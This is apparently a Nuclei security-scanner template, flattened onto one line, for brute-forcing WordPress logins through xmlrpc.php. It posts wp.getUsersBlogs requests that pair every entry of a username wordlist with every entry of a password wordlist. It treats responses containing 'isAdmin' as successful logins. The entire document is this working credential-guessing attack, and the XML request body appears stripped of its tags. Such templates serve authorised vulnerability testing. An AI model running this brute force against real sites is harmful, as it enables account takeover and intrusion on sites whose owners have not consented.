id: wordpress-xmlrpc-brute-force info: name: Wordpress XMLRPC.php username and password Bruteforcer author: Exid severity: high description: This template bruteforces username and passwords through xmlrpc.php being available. reference: - https://bugdasht.ir/reports/3c6841c0-ae4c-11eb-a510-517171a9198c - https://www.acunetix.com/vulnerabilities/web/wordpress-xml-rpc-authentication-brute-force/ metadata: max-request: 276 tags: wordpress,php,xmlrpc,fuzz http: - raw: - | POST /xmlrpc.php HTTP/1.1 Host: {{Hostname}} Content-Length: 235 wp.getUsersBlogs {{username}} {{password}} attack: clusterbomb payloads: username: helpers/wordlists/wp-users.txt password: helpers/wordlists/wp-passwords.txt matchers-condition: and matchers: - type: status status: - 200 - type: word part: body words: - 'url' - 'xmlrpc' - 'isAdmin' condition: and # digest: 4a0a00473045022100edfa1eaae603d4a662ebaa0eaddba9894ee90c4bd3431bcaae13280d7e9c2fa5022027b501e990478aaca56cc4162f495540c80217172b1c28e0b1516864f9913ad8:922c64590222798bb761d5b6d8e72950